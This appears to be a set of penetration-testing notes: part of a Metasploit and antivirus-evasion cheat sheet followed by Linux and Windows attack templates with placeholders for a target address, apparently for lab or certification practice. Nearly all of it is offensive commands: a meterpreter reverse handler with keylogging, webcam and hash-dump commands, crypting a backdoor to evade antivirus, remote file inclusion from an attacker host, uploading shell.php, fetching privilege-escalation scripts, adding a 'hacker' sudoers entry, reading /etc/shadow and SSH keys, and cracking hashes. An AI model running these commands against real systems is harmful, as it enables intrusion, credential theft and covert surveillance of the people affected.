2069 | payload
2070 | use exploit/multi/handler
2071 | set PAYLOAD windows/meterpreter/reverse\_https
2072 | set LHOST $ip
2073 | set LPORT 443
2074 | exploit
2075 | \[\*\] Started HTTPS reverse handler on https://$ip:443/
2076 |
2077 | - Building Your Own MSF Module
2078 |
2079 | - mkdir -p ~/.msf4/modules/exploits/linux/misc
2080 | cd ~/.msf4/modules/exploits/linux/misc
2081 | cp
2082 | /usr/share/metasploitframework/modules/exploits/linux/misc/gld\_postfix.rb
2083 | ./crossfire.rb
2084 | nano crossfire.rb
2085 |
2086 | - Post Exploitation with Metasploit
2087 |
2088 | - download Download a file or directory
2089 | upload Upload a file or directory
2090 | portfwd Forward a local port to a remote service
2091 | route View and modify the routing table
2092 | keyscan\_start Start capturing keystrokes
2093 | keyscan\_stop Stop capturing keystrokes
2094 | screenshot Grab a screenshot of the interactive desktop
2095 | record\_mic Record audio from the default microphone for X
2096 | seconds
2097 | webcam\_snap Take a snapshot from the specified webcam
2098 | getsystem Attempt to elevate your privilege to that of local
2099 | system.
2100 | hashdump Dumps the contents of the SAM database
2101 |
2102 | - Meterpreter Post Exploitation Features
2103 |
2104 | - Create a Meterpreter background session
2105 | background
2106 |
2107 | Bypassing Antivirus Software
2108 | ===========================================================================================================================
2109 |
2110 | - Crypting Known Malware with Software Protectors
2111 |
2112 | - One such open source crypter, called Hyperion
2113 | cp /usr/share/windows-binaries/Hyperion-1.0.zip
2114 | unzip Hyperion-1.0.zip
2115 | cd Hyperion-1.0/
2116 | i686-w64-mingw32-g++ Src/Crypter/\*.cpp -o hyperion.exe
2117 | cp -p
2118 | /usr/lib/gcc/i686-w64-mingw32/5.3-win32/libgcc\_s\_sjlj-1.dll
2119 | .
2120 | cp -p /usr/lib/gcc/i686-w64-mingw32/5.3-win32/libstdc++-6.dll
2121 | .
2122 | wine hyperion.exe ../backdoor.exe ../crypted.exe
2123 |
--------------------------------------------------------------------------------
/linux-template.md:
--------------------------------------------------------------------------------
1 | ## Info-sheet
2 |
3 | - DNS-Domain name:
4 | - Host name:
5 | - OS:
6 | - Server:
7 | - Kernel:
8 | - Workgroup:
9 | - Windows domain:
10 |
11 | Services and ports:
12 | INSERTTCPSCAN
13 |
14 | ## Recon
15 |
16 |
17 | ```
18 | Always start with a stealthy scan to avoid closing ports.
19 |
20 | # Syn-scan
21 | nmap -sS INSERTIPADDRESS
22 |
23 | # Scan all ports, might take a while.
24 | nmap INSERTIPADDRESS -p-
25 |
26 | # Service-version, default scripts, OS:
27 | nmap INSERTIPADDRESS -sV -sC -O -p 111,222,333
28 |
29 | # Scan for UDP
30 | nmap INSERTIPADDRESS -sU
31 | unicornscan -mU -v -I INSERTIPADDRESS
32 |
33 | # Connect to udp if one is open
34 | nc -u INSERTIPADDRESS 48772
35 |
36 | # Monster scan
37 | nmap INSERTIPADDRESS -p- -A -T4 -sC
38 | ```
39 |
40 |
41 | ### Port 21 - FTP
42 |
43 | - FTP-Name:
44 | - FTP-version:
45 | - Anonymous login:
46 |
47 | INSERTFTPTEST
48 |
49 |
50 | ```
51 | nmap --script=ftp-anon,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum -p 21 INSERTIPADDRESS
52 | ```
53 |
54 | ### Port 22 - SSH
55 |
56 | - Name:
57 | - Version:
58 | - Takes-password:
59 | - If you have usernames test login with username:username
60 |
61 | INSERTSSHCONNECT
62 |
63 | ```
64 | nc INSERTIPADDRESS 22
65 | ```
66 |
67 | ### Port 25
68 |
69 | - Name:
70 | - Version:
71 | - VRFY:
72 |
73 | INSERTSMTPCONNECT
74 |
75 |
76 | ```
77 | nc -nvv INSERTIPADDRESS 25
78 | HELO foo
79 |
80 | telnet INSERTIPADDRESS 25
81 | VRFY root
82 |
83 | nmap --script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 INSERTIPADDRESS
84 | ```
85 |
86 | ### Port 69 - UDP - TFTP
87 |
88 | This is used for tftp-server.
89 |
90 |
91 | ### Port 110 - Pop3
92 |
93 | - Name:
94 | - Version:
95 |
96 | INSERTPOP3CONNECT
97 |
98 | ```
99 | telnet INSERTIPADDRESS 110
100 | USER pelle@INSERTIPADDRESS
101 | PASS admin
102 |
103 | or:
104 |
105 | USER pelle
106 | PASS admin
107 |
108 | # List all emails
109 | list
110 |
111 | # Retrieve email number 5, for example
112 | retr 9
113 | ```
114 |
115 | ### Port 111 - Rpcbind
116 |
117 | ```
118 | rpcinfo -p INSERTIPADDRESS
119 | ```
120 |
121 |
122 | ### Port 135 - MSRPC
123 |
124 | Some versions are vulnerable.
125 |
126 | ### Port 143 - Imap
127 |
128 | ### Port 139/445 - SMB
129 |
130 | - Name:
131 | - Version:
132 | - Domain/workgroup name:
133 | - Domain-sid:
134 | - Allows unauthenticated login:
135 |
136 |
137 | ```
138 | nmap --script=smb-enum-shares.nse,smb-ls.nse,smb-enum-users.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-security-mode.nse,smbv2-enabled.nse,smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-regsvc-dos.nse,smbv2-enabled.nse INSERTIPADDRESS -p 445
139 |
140 |
141 | enum4linux -a INSERTIPADDRESS
142 | rpcclient -U "" INSERTIPADDRESS
143 | srvinfo
144 | enumdomusers
145 | getdompwinfo
146 | querydominfo
147 | netshareenum
148 | netshareenumall
149 |
150 | smbclient -L INSERTIPADDRESS
151 | smbclient //INSERTIPADDRESS/tmp
152 | smbclient \\\\INSERTIPADDRESS\\ipc$ -U john
153 | smbclient //INSERTIPADDRESS/ipc$ -U john
154 | ```
155 |
156 |
157 | ### Port 161/162 UDP - SNMP
158 |
159 | ```
160 | nmap -vv -sV -sU -Pn -p 161,162 --script=snmp-netstat,snmp-processes INSERTIPADDRESS
161 | snmp-check -t INSERTIPADDRESS -c public
162 | ```
163 |
164 | ```
165 | # Common community strings
166 | public
167 | private
168 | community
169 | ```
170 |
171 |
172 | ### Port 554 - RTSP
173 |
174 |
175 | ### Port 1030/1032/1033/1038
176 |
177 | Used by RPC to connect in domain network.
178 |
179 | ## Port 1521 - Oracle
180 |
181 | - Name:
182 | - Version:
183 | - Password protected:
184 |
185 | ```
186 | tnscmd10g version -h INSERTIPADDRESS
187 | tnscmd10g status -h INSERTIPADDRESS
188 | ```
189 |
190 | ### Port 2049 - NFS
191 |
192 | ```
193 | showmount -e INSERTIPADDRESS
194 |
195 | If you find anything you can mount it like this:
196 |
197 | mount INSERTIPADDRESS:/ /tmp/NFS
198 | mount -t INSERTIPADDRESS:/ /tmp/NFS
199 | ```
200 |
201 | ### Port 2100 - Oracle XML DB
202 |
203 | - Name:
204 | - Version:
205 | - Default logins:
206 |
207 | ```
208 | sys:sys
209 | scott:tiger
210 | ```
211 |
212 | Default passwords
213 | https://docs.oracle.com/cd/B10501_01/win.920/a95490/username.htm
214 |
215 |
216 | ### 3306 - MySQL
217 |
218 | - Name:
219 | - Version:
220 |
221 | ```
222 | nmap --script=mysql-databases.nse,mysql-empty-password.nse,mysql-enum.nse,mysql-info.nse,mysql-variables.nse,mysql-vuln-cve2012-2122.nse INSERTIPADDRESS -p 3306
223 |
224 | mysql --host=INSERTIPADDRESS -u root -p
225 | ```
226 |
227 | ### Port 3339 - Oracle web interface
228 |
229 |
230 | - Basic info about web service (apache, nginx, IIS)
231 | - Server:
232 | - Scripting language:
233 | - Apache Modules:
234 | - IP-address:
235 |
236 | ### Port 80 - Web server
237 |
238 | - Server:
239 | - Scripting language:
240 | - Apache Modules:
241 | - IP-address:
242 | - Domain-name address:
243 |
244 |
245 | INSERTCURLHEADER
246 |
247 | - Web application (ex, wordpress, joomla, phpmyadmin)
248 | - Name:
249 | - Version:
250 | - Admin-login:
251 |
252 |
253 | ```
254 | # Nikto
255 | nikto -h http://INSERTIPADDRESS
256 |
257 | # Nikto with squid proxy
258 | nikto -h INSERTIPADDRESS -useproxy http://INSERTIPADDRESS:4444
259 |
260 | # Get header
261 | curl -i INSERTIPADDRESS
262 |
263 | # Get everything
264 | curl -i -L INSERTIPADDRESS
265 |
266 | # Check for title and all links
267 | curl INSERTIPADDRESS -s -L | grep "title\|href" | sed -e 's/^[[:space:]]*//'
268 |
269 | # Look at page with just text
270 | curl INSERTIPADDRESS -s -L | html2text -width '99' | uniq
271 |
272 | # Check if it is possible to upload
273 | curl -v -X OPTIONS http://INSERTIPADDRESS/
274 | curl -v -X PUT -d '' http://INSERTIPADDRESS/test/shell.php
275 |
276 | dotdotpwn.pl -m http -h INSERTIPADDRESS -M GET -o unix
277 | ```
278 |
279 | #### Nikto scan
280 |
281 |
282 | INSERTNIKTOSCAN
283 |
284 |
285 | #### Url brute force
286 |
287 | ```
288 | # Not recursive
289 | dirb http://INSERTIPADDRESS -r -o dirb-INSERTIPADDRESS.txt
290 |
291 | # Gobuster - remove relevant responde codes (403 for example)
292 | gobuster -u http://INSERTIPADDRESS -w /usr/share/seclists/Discovery/Web_Content/common.txt -s '200,204,301,302,307,403,500' -e
293 | ```
294 |
295 | INSERTDIRBSCAN
296 |
297 |
298 | #### Default/Weak login
299 |
300 | Search documentation for default passwords and test them
301 |
302 | ```
303 | site:webapplication.com password
304 | ```
305 |
306 | ```
307 | admin admin
308 | admin password
309 | admin
310 | admin
311 | root root
312 | root admin
313 | root password
314 | root
315 | password
316 | admin
317 | username
318 | username
319 | ```
320 |
321 |
322 | #### LFI/RFI
323 |
324 |
325 |
326 |
327 | ```
328 | fimap -u "http://INSERTIPADDRESS/example.php?test="
329 |
330 | # Ordered output
331 | curl -s http://INSERTIPADDRESS/gallery.php?page=/etc/passwd
332 | /root/Tools/Kadimus/kadimus -u http://INSERTIPADDRESS/example.php?page=
333 | ```
334 |
335 | #### SQL-Injection
336 |
337 | ```
338 | # Post
339 | ./sqlmap.py -r search-test.txt -p tfUPass
340 |
341 | # Get
342 | sqlmap -u "http://INSERTIPADDRESS/index.php?id=1" --dbms=mysql
343 |
344 | # Crawl
345 | sqlmap -u http://INSERTIPADDRESS --dbms=mysql --crawl=3
346 | ```
347 |
348 | #### Sql-login-bypass
349 |
350 | - Open Burp-suite
351 | - Make and intercept a request
352 | - Send to intruder
353 | - Cluster attack.
354 | - Paste in sqlibypass-list (https://bobloblaw.gitbooks.io/security/content/sql-injections.html)
355 | - Attack
356 | - Check for response length variation
357 |
358 |
359 | ### Password brute force - last resort
360 |
361 | ```
362 | cewl
363 | ```
364 |
365 | ### Port 443 - HTTPS
366 |
367 | Heartbleed:
368 |
369 | ```
370 | # Heartbleed
371 | sslscan INSERTIPADDRESS:443
372 | ```
373 |
374 | ## Vulnerability analysis
375 |
376 | Now we have gathered information about the system. Now comes the part where we look for exploits and vulnerabilites and features.
377 |
378 | ### To try - List of possibilies
379 | Add possible exploits here:
380 |
381 |
382 |
383 | ### Find sploits - Searchsploit and google
384 |
385 | Where there are many exploits for a software, use google. It will automatically sort it by popularity.
386 |
387 | ```
388 | site:exploit-db.com apache 2.4.7
389 |
390 | # Remove dos-exploits
391 |
392 | searchsploit Apache 2.4.7 | grep -v '/dos/'
393 | searchsploit Apache | grep -v '/dos/' | grep -vi "tomcat"
394 |
395 | # Only search the title (exclude the path), add the -t
396 | searchsploit -t Apache | grep -v '/dos/'
397 | ```
398 |
399 |
400 |
401 | ----------------------------------------------------------------------------
402 |
403 |
404 |
405 | '''''''''''''''''''''''''''''''''' PRIVESC '''''''''''''''''''''''''''''''''
406 |
407 |
408 |
409 | -----------------------------------------------------------------------------
410 |
411 |
412 |
413 | ## Privilege escalation
414 |
415 | Now we start the whole enumeration-process over gain.
416 |
417 | - Kernel exploits
418 | - Programs running as root
419 | - Installed software
420 | - Weak/reused/plaintext passwords
421 | - Inside service
422 | - Suid misconfiguration
423 | - World writable scripts invoked by root
424 | - Unmounted filesystems
425 |
426 | Less likely
427 |
428 | - Private ssh keys
429 | - Bad path configuration
430 | - Cronjobs
431 |
432 |
433 | ### To-try list
434 |
435 | Here you will add all possible leads. What to try.
436 |
437 |
438 | ### Useful commands
439 |
440 | ```
441 | # Spawning shell
442 | python -c 'import pty; pty.spawn("/bin/sh")'
443 |
444 | # Access to more binaries
445 | export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
446 |
447 | # Set up webserver
448 | cd /root/oscp/useful-tools/privesc/linux/privesc-scripts; python -m SimpleHTTPServer 8080
449 |
450 | # Download all files
451 | wget http://192.168.1.101:8080/ -r; mv 192.168.1.101:8080 exploits; cd exploits; rm index.html; chmod 700 LinEnum.sh linprivchecker.py unix-privesc-check
452 |
453 | ./LinEnum.sh -t -k password -r LinEnum.txt
454 | python linprivchecker.py extended
455 | ./unix-privesc-check standard
456 |
457 |
458 | # Writable directories
459 | /tmp
460 | /var/tmp
461 |
462 |
463 | # Add user to sudoers
464 | echo "hacker ALL=(ALL:ALL) ALL" >> /etc/sudoers
465 | ```
466 |
467 |
468 | ### Basic info
469 |
470 | - OS:
471 | - Version:
472 | - Kernel version:
473 | - Architecture:
474 | - Current user:
475 |
476 | **Devtools:**
477 | - GCC:
478 | - NC:
479 | - WGET:
480 |
481 | **Users with login:**
482 |
483 | ```
484 | uname -a
485 | env
486 | id
487 | cat /proc/version
488 | cat /etc/issue
489 | cat /etc/passwd
490 | cat /etc/group
491 | cat /etc/shadow
492 | cat /etc/hosts
493 |
494 | # Users with login
495 | grep -vE "nologin" /etc/passwd
496 |
497 | # Priv Enumeration Scripts
498 |
499 |
500 | upload /unix-privesc-check
501 | upload /root/Desktop/Backup/Tools/Linux_privesc_tools/linuxprivchecker.py ./
502 | upload /root/Desktop/Backup/Tools/Linux_privesc_tools/LinEnum.sh ./
503 |
504 | python linprivchecker.py extended
505 | ./LinEnum.sh -t -k password
506 | unix-privesc-check
507 | ```
508 |
509 | ### Kernel exploits
510 |
511 | ```
512 | site:exploit-db.com kernel version
513 |
514 | perl /root/oscp/useful-tools/privesc/linux/Linux_Exploit_Suggester/Linux_Exploit_Suggester.pl -k 2.6
515 |
516 | python linprivchecker.py extended
517 | ```
518 |
519 | ### Programs running as root
520 |
521 | Look for webserver, mysql or anything else like that.
522 |
523 | ```
524 | # Metasploit
525 | ps
526 |
527 | # Linux
528 | ps aux
529 | ```
530 |
531 | ### Installed software
532 |
533 | ```
534 | /usr/local/
535 | /usr/local/src
536 | /usr/local/bin
537 | /opt/
538 | /home
539 | /var/
540 | /usr/src/
541 |
542 | # Debian
543 | dpkg -l
544 |
545 | # CentOS, OpenSuse, Fedora, RHEL
546 | rpm -qa (CentOS / openSUSE )
547 |
548 | # OpenBSD, FreeBSD
549 | pkg_info
550 | ```
551 |
552 |
553 | ### Weak/reused/plaintext passwords
554 |
555 | - Check database config-file
556 | - Check databases
557 | - Check weak passwords
558 |
559 | ```
560 | username:username
561 | username:username1
562 | username:root
563 | username:admin
564 | username:qwerty
565 | username:password
566 | ```
567 |
568 | - Check plaintext
569 |
570 | ```
571 | ./LinEnum.sh -t -k password
572 | ```
573 |
574 | ### Inside service
575 |
576 | ```
577 | # Linux
578 | netstat -anlp
579 | netstat -ano
580 | ```
581 |
582 | ### Suid misconfiguration
583 |
584 | Binary with suid permission can be run by anyone, but when they are run they are run as root!
585 |
586 | Example programs:
587 |
588 | ```
589 | nmap
590 | vim
591 | nano
592 | ```
593 |
594 | ```
595 | find / -perm -u=s -type f 2>/dev/null
596 | ```
597 |
598 |
599 | ### Unmounted filesystems
600 |
601 | Here we are looking for any unmounted filesystems. If we find one we mount it and start the priv-esc process over again.
602 |
603 | ```
604 | mount -l
605 | ```
606 |
607 | ### Cronjob
608 |
609 | Look for anything that is owned by privileged user but writable for you
610 |
611 | ```
612 | crontab -l
613 | ls -alh /var/spool/cron
614 | ls -al /etc/ | grep cron
615 | ls -al /etc/cron*
616 | cat /etc/cron*
617 | cat /etc/at.allow
618 | cat /etc/at.deny
619 | cat /etc/cron.allow
620 | cat /etc/cron.deny
621 | cat /etc/crontab
622 | cat /etc/anacrontab
623 | cat /var/spool/cron/crontabs/root
624 | ```
625 |
626 | ### SSH Keys
627 |
628 | Check all home directories
629 |
630 | ```
631 | cat ~/.ssh/authorized_keys
632 | cat ~/.ssh/identity.pub
633 | cat ~/.ssh/identity
634 | cat ~/.ssh/id_rsa.pub
635 | cat ~/.ssh/id_rsa
636 | cat ~/.ssh/id_dsa.pub
637 | cat ~/.ssh/id_dsa
638 | cat /etc/ssh/ssh_config
639 | cat /etc/ssh/sshd_config
640 | cat /etc/ssh/ssh_host_dsa_key.pub
641 | cat /etc/ssh/ssh_host_dsa_key
642 | cat /etc/ssh/ssh_host_rsa_key.pub
643 | cat /etc/ssh/ssh_host_rsa_key
644 | cat /etc/ssh/ssh_host_key.pub
645 | cat /etc/ssh/ssh_host_key
646 | ```
647 |
648 |
649 | ### Bad path configuration
650 |
651 | Require user interaction
652 |
653 |
654 |
655 |
656 |
657 | ------------------------------------------------------------------------
658 |
659 |
660 |
661 |
662 | ----------------------------- LOOT LOOT LOOT LOOT ----------------------
663 |
664 |
665 |
666 |
667 | ------------------------------------------------------------------------
668 |
669 |
670 | ## Loot
671 |
672 | **Checklist**
673 |
674 | - Proof:
675 | - Network secret:
676 | - Passwords and hashes:
677 | - Dualhomed:
678 | - Tcpdump:
679 | - Interesting files:
680 | - Databases:
681 | - SSH-keys:
682 | - Browser:
683 | - Mail:
684 |
685 |
686 | ### Proof
687 |
688 | ```
689 | /root/proof.txt
690 | ```
691 |
692 | ### Network secret
693 |
694 | ```
695 | /root/network-secret.txt
696 | ```
697 |
698 | ### Passwords and hashes
699 |
700 | ```
701 | cat /etc/passwd
702 | cat /etc/shadow
703 |
704 | unshadow passwd shadow > unshadowed.txt
705 | john --rules --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt
706 | ```
707 |
708 | ### Dualhomed
709 |
710 | ```
711 | ifconfig
712 | ifconfig -a
713 | arp -a
714 | ```
715 |
716 | ### Tcpdump
717 |
718 | ```
719 | tcpdump -i any -s0 -w capture.pcap
720 | tcpdump -i eth0 -w capture -n -U -s 0 src not 192.168.1.X and dst not 192.168.1.X
721 | tcpdump -vv -i eth0 src not 192.168.1.X and dst not 192.168.1.X
722 | ```
723 |
724 | ### Interesting files
725 |
726 | ```
727 | #Meterpreter
728 | search -f *.txt
729 | search -f *.zip
730 | search -f *.doc
731 | search -f *.xls
732 | search -f config*
733 | search -f *.rar
734 | search -f *.docx
735 | search -f *.sql
736 |
737 | .ssh:
738 | .bash_history
739 | ```
740 |
741 | ### Databases
742 |
743 | ### SSH-Keys
744 |
745 | ### Browser
746 |
747 | ### Mail
748 |
749 | ```
750 | /var/mail
751 | /var/spool/mail
752 | ```
753 |
754 | ### GUI
755 | If there is a gui we want to check out the browser.
756 |
757 | ```
758 | echo $DESKTOP_SESSION
759 | echo $XDG_CURRENT_DESKTOP
760 | echo $GDMSESSION
761 | ```
762 |
763 | ## How to replicate:
764 |
--------------------------------------------------------------------------------
/windows-template.md:
--------------------------------------------------------------------------------
1 | ## Info-sheet
2 |
3 |
4 | - DNS-Domain name:
5 | - Host name:
6 | - OS:
7 | - Server:
8 | - Workgroup:
9 | - Windows domain:
10 | - Services and ports:
11 |
12 | INSERTTCPSCAN
13 |
14 |
15 | ## Recon
16 |
17 | ```
18 | Always start with a stealthy scan to avoid closing ports.
19 |
20 | # Syn-scan
21 | nmap -sS INSERTIPADDRESS
22 |
23 | # Service-version, default scripts, OS:
24 | nmap INSERTIPADDRESS -sV -sC -O
25 |
26 | # Scan all ports, might take a while.
27 | nmap INSERTIPADDRESS -p-
28 |
29 | # Scan for UDP
30 | nmap INSERTIPADDRESS -sU
31 | unicornscan -mU -v -I INSERTIPADDRESS
32 |
33 | # Connect to udp if one is open
34 | nc -u INSERTIPADDRESS 48772
35 |
36 | # Monster scan
37 | nmap INSERTIPADDRESS -p- -A -T4 -sC
38 | ```
39 |
40 |
41 | ### Port 21 - FTP
42 |
43 | - Name:
44 | - Version:
45 | - Anonymous login:
46 |
47 | INSERTFTPTEST
48 |
49 | ```
50 | nmap --script=ftp-anon,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum -p 21 INSERTIPADDRESS
51 | ```
52 |
53 | ### Port 22 - SSH
54 |
55 | - Name:
56 | - Version:
57 | - Protocol:
58 | - RSA-key-fingerprint:
59 | - Takes-password:
60 | If you have usernames test login with username:username
61 |
62 | INSERTSSHCONNECT
63 |
64 |
65 | ### Port 25
66 |
67 | - Name:
68 | - Version:
69 | - VRFY:
70 | - EXPN:
71 |
72 | INSERTSMTPCONNECT
73 |
74 | ```
75 | nc -nvv INSERTIPADDRESS 25
76 | HELO foo
77 |
78 | nmap --script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 INSERTIPADDRESS
79 | ```
80 |
81 | ### Port 110 - Pop3
82 |
83 | - Name:
84 | - Version:
85 |
86 | INSERTPOP3CONNECT
87 |
88 | ### Port 135 - MSRPC
89 |
90 | Some versions are vulnerable.
91 |
92 | ```
93 | nmap INSERTIPADDRESS --script=msrpc-enum
94 | ```
95 |
96 | Exploit:
97 |
98 | ```
99 | msf > use exploit/windows/dcerpc/ms03_026_dcom
100 | ```
101 |
102 | ### Port 139/445 - SMB
103 |
104 | - Name:
105 | - Version:
106 | - Domain/workgroup name:
107 | - Domain-sid:
108 | - Allows unauthenticated login:
109 |
110 |
111 | ```
112 | nmap --script=smb-enum-shares.nse,smb-ls.nse,smb-enum-users.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-security-mode.nse,smbv2-enabled.nse,smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-regsvc-dos.nse,smbv2-enabled.nse INSERTIPADDRESS -p 445
113 |
114 | enum4linux -a INSERTIPADDRESS
115 |
116 | rpcclient -U "" INSERTIPADDRESS
117 | srvinfo
118 | enumdomusers
119 | getdompwinfo
120 | querydominfo
121 | netshareenum
122 | netshareenumall
123 |
124 | smbclient -L INSERTIPADDRESS
125 | smbclient //INSERTIPADDRESS/tmp
126 | smbclient \\\\INSERTIPADDRESS\\ipc$ -U john
127 | smbclient //INSERTIPADDRESS/ipc$ -U john
128 | smbclient //INSERTIPADDRESS/admin$ -U john
129 |
130 | Log in with shell:
131 | winexe -U username //INSERTIPADDRESS "cmd.exe" --system
132 |
133 | ```
134 |
135 | ### Port 161/162 UDP - SNMP
136 |
137 |
138 | ```
139 | nmap -vv -sV -sU -Pn -p 161,162 --script=snmp-netstat,snmp-processes INSERTIPADDRESS
140 | snmp-check -t INSERTIPADDRESS -c public
141 | ```
142 |
143 | ```
144 | # Common community strings
145 | public
146 | private
147 | community
148 | ```
149 |
150 |
151 |
152 | ### Port 554 - RTSP
153 |
154 |
155 | ### Port 1030/1032/1033/1038
156 |
157 | Used by RPC to connect in domain network. Usually nothing.
158 |
159 | ### Port 1433 - MSSQL
160 |
161 | - Version:
162 |
163 | ```
164 | use auxiliary/scanner/mssql/mssql_ping
165 |
166 | # Last options. Brute force.
167 | scanner/mssql/mssql_login
168 |
169 | # Log in to mssql
170 | sqsh -S INSERTIPADDRESS -U sa
171 |
172 | # Execute commands
173 | xp_cmdshell 'date'
174 | go
175 | ```
176 |
177 | If you have credentials look in metasploit for other modules.
178 |
179 | ## Port 1521 - Oracle
180 |
181 | Name:
182 | Version:
183 | Password protected:
184 |
185 | ```
186 | tnscmd10g version -h INSERTIPADDRESS
187 | tnscmd10g status -h INSERTIPADDRESS
188 | ```
189 |
190 |
191 | ### Port 2100 - Oracle XML DB
192 |
193 | Can be accessed through ftp.
194 | Some default passwords here: https://docs.oracle.com/cd/B10501_01/win.920/a95490/username.htm
195 | - Name:
196 | - Version:
197 |
198 | Default logins:
199 |
200 | ```
201 | sys:sys
202 | scott:tiger
203 | ```
204 |
205 | ### Port 2049 - NFS
206 |
207 | ```
208 | showmount -e INSERTIPADDRESS
209 |
210 | If you find anything you can mount it like this:
211 |
212 | mount INSERTIPADDRESS:/ /tmp/NFS
213 | mount -t INSERTIPADDRESS:/ /tmp/NFS
214 | ```
215 |
216 | ### 3306 - MySQL
217 |
218 | - Name:
219 | - Version:
220 |
221 | ```
222 | mysql --host=INSERTIPADDRESS -u root -p
223 |
224 | nmap -sV -Pn -vv -script=mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 INSERTIPADDRESS -p 3306
225 | ```
226 |
227 | ### Port 3339 - Oracle web interface
228 |
229 | - Basic info about web service (apache, nginx, IIS)
230 | - Server:
231 | - Scripting language:
232 | - Apache Modules:
233 | - IP-address:
234 | - Domain-name address:
235 |
236 | ### Port 3389 - Remote desktop
237 |
238 | Test logging in to see what OS is running
239 |
240 | ```
241 | rdesktop -u guest -p guest INSERTIPADDRESS -g 94%
242 |
243 | # Brute force
244 | ncrack -vv --user Administrator -P /root/oscp/passwords.txt rdp://INSERTIPADDRESS
245 | ```
246 |
247 |
248 | ### Port 80
249 |
250 | - Server:
251 | - Scripting language:
252 | - Apache Modules:
253 | - Domain-name address:
254 |
255 | INSERTCURLHEADER
256 |
257 |
258 | - Web application
259 | - Name:
260 | - Version:
261 |
262 | ```
263 | # Nikto
264 | nikto -h http://INSERTIPADDRESS
265 |
266 | # Nikto with squid proxy
267 | nikto -h INSERTIPADDRESS -useproxy http://INSERTIPADDRESS:4444
268 |
269 | # Get header
270 | curl -i INSERTIPADDRESS
271 |
272 | # Get everything
273 | curl -i -L INSERTIPADDRESS
274 |
275 | # Check if it is possible to upload using put
276 | curl -v -X OPTIONS http://INSERTIPADDRESS/
277 | curl -v -X PUT -d '' http://INSERTIPADDRESS/test/shell.php
278 |
279 | # Check for title and all links
280 | dotdotpwn.pl -m http -h INSERTIPADDRESS -M GET -o unix
281 | ```
282 |
283 |
284 | #### Nikto scan
285 |
286 |
287 | INSERTNIKTOSCAN
288 |
289 |
290 |
291 | #### Url brute force
292 |
293 |
294 |
295 | ```
296 | # Dirb
297 | dirb http://INSERTIPADDRESS -r -o dirb-INSERTIPADDRESS.txt
298 |
299 | # Gobuster - remove relevant responde codes (403 for example)
300 | gobuster -u http://INSERTIPADDRESS -w /usr/share/seclists/Discovery/Web_Content/common.txt -s '200,204,301,302,307,403,500' -e
301 | ```
302 |
303 | INSERTDIRBSCAN
304 |
305 |
306 | #### Default/Weak login
307 |
308 | Google documentation for default passwords and test them:
309 |
310 | ```
311 | site:webapplication.com password
312 | ```
313 |
314 | ```
315 | admin admin
316 | admin password
317 | admin
318 | admin nameofservice
319 | root root
320 | root admin
321 | root password
322 | root nameofservice
323 | password
324 | admin
325 | username
326 | nameofservice
327 | ```
328 |
329 | #### LFI/RFI
330 |
331 | ```
332 | # Kadimus
333 | /root/Tools/Kadimus/kadimus -u http://INSERTIPADDRESS/example.php?page=
334 |
335 |
336 | # Bypass execution
337 | http://INSERTIPADDRESS/index.php?page=php://filter/convert.base64-encode/resource=index
338 | base64 -d savefile.php
339 |
340 | # Bypass extension
341 | http://INSERTIPADDRESS/page=http://192.168.1.101/maliciousfile.txt%00
342 | http://INSERTIPADDRESS/page=http://192.168.1.101/maliciousfile.txt?
343 | ```
344 |
345 |
346 | #### SQL-Injection
347 |
348 | ```
349 | # Post
350 | ./sqlmap.py -r search-test.txt -p tfUPass
351 |
352 | # Get
353 | sqlmap -u "http://INSERTIPADDRESS/index.php?id=1" --dbms=mysql
354 |
355 | # Crawl
356 | sqlmap -u http://INSERTIPADDRESS --dbms=mysql --crawl=3
357 | ```
358 |
359 | #### Sql-login-bypass
360 |
361 |
362 | - Open Burp-suite
363 | - Make and intercept request
364 | - Send to intruder
365 | - Cluster attack
366 | - Paste in sqlibypass-list (https://bobloblaw.gitbooks.io/security/content/sql-injections.html)
367 | - Attack
368 | - Check for response length variation
369 |
370 | ### Password brute force - last resort
371 |
372 | ```
373 | cewl
374 | ```
375 |
376 | ### Port 443 - HTTPS
377 |
378 | Heartbleed:
379 |
380 | ```
381 | sslscan INSERTIPADDRESS:443
382 | ```
383 |
384 | ## Vulnerability analysis
385 |
386 | Now we have gathered information about the system. Now comes the part where we look for exploits and vulnerabilities and features.
387 |
388 | ### To try - List of possibilities
389 | Add possible exploits here:
390 |
391 |
392 | ### Find sploits - Searchsploit and google
393 |
394 | Where there are many exploits for a software, use google. It will automatically sort it by popularity.
395 |
396 | ```
397 | site:exploit-db.com apache 2.4.7
398 |
399 | # Remove dos-exploits
400 |
401 | searchsploit Apache 2.4.7 | grep -v '/dos/'
402 | searchsploit Apache | grep -v '/dos/' | grep -vi "tomcat"
403 |
404 | # Only search the title (exclude the path), add the -t
405 | searchsploit -t Apache | grep -v '/dos/'
406 | ```
407 |
408 |
409 |
410 | ----------------------------------------------------------------------------
411 |
412 |
413 |
414 | '''''''''''''''''''''''''''''''''' PRIVESC '''''''''''''''''''''''''''''''''
415 |
416 |
417 |
418 | -----------------------------------------------------------------------------
419 |
420 |
421 | ## Privilege escalation
422 |
423 | Now we start the whole enumeration-process over gain. This is a checklist. You need to check of every single one, in this order.
424 |
425 | - Kernel exploits
426 | - Cleartext password
427 | - Reconfigure service parameters
428 | - Inside service
429 | - Program running as root
430 | - Installed software
431 | - Scheduled tasks
432 | - Weak passwords
433 |
